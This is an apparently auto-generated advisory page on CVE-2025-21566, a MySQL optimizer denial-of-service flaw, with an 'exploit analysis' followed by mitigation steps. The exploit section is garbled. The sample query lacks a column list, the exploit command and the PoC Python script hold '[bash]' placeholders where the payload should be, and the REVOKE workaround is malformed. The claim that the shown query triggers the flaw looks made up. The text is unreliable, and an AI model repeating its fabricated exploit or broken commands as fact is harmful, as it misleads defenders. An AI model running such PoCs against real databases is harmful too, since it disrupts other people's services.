How the Vulnerability Works
CVE-2025-21566 is a vulnerability in MySQL Server’s optimizer component, affecting versions 9.1.0 and prior. The flaw allows a low-privileged attacker with network access to exploit the optimizer’s query processing logic, causing a server crash or persistent hang (DoS). The vulnerability arises when specially crafted SQL queries trigger an infinite loop or memory corruption in the optimizer’s execution plan generation. Attackers can repeatedly send malicious queries, forcing excessive CPU consumption or memory allocation failures, leading to service disruption. The CVSS 3.1 score of 6.5 reflects its impact on availability without compromising data integrity or confidentiality.
DailyCVE Form
Platform: MySQL
Version: ≤ 9.1.0
Vulnerability: DoS
Severity: Medium
Date: 04/08/2025
What Undercode Say:
Exploitation Analysis
1. Malicious Query Example:
SELECT FROM (SELECT 1 AS a UNION SELECT 2) AS b WHERE b.a IN (SELECT a FROM (SELECT 1 AS a UNION SELECT 2) AS c WHERE c.a = b.a);
This recursive query can trigger the optimizer flaw.
2. Exploit Command:
mysql -u lowpriv_user -p -h target_db -e "EXPLAIN [bash]"
3. PoC Script:
import pymysql
conn = pymysql.connect(host="target_db", user="lowpriv", password="pass")
cursor = conn.cursor()
cursor.execute("[bash]") Triggers DoS
Protection Measures
1. Patch: Upgrade to MySQL 9.1.1 or later.
- Mitigation: Restrict network access to MySQL ports (3306 by default).
3. Workaround:
REVOKE SELECT ON . FROM 'lowpriv_user'@'%';
4. Detection: Monitor logs for repeated optimizer-related crashes:
grep -i "optimizer" /var/log/mysql/error.log
5. Configuration Hardening:
[bash] optimizer_switch='derived_merge=off'
6. Network Controls:
iptables -A INPUT -p tcp --dport 3306 -j DROP
7. Audit:
SELECT user, host FROM mysql.user WHERE Select_priv = 'Y';
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-21566
Extra Source Hub:
Undercode
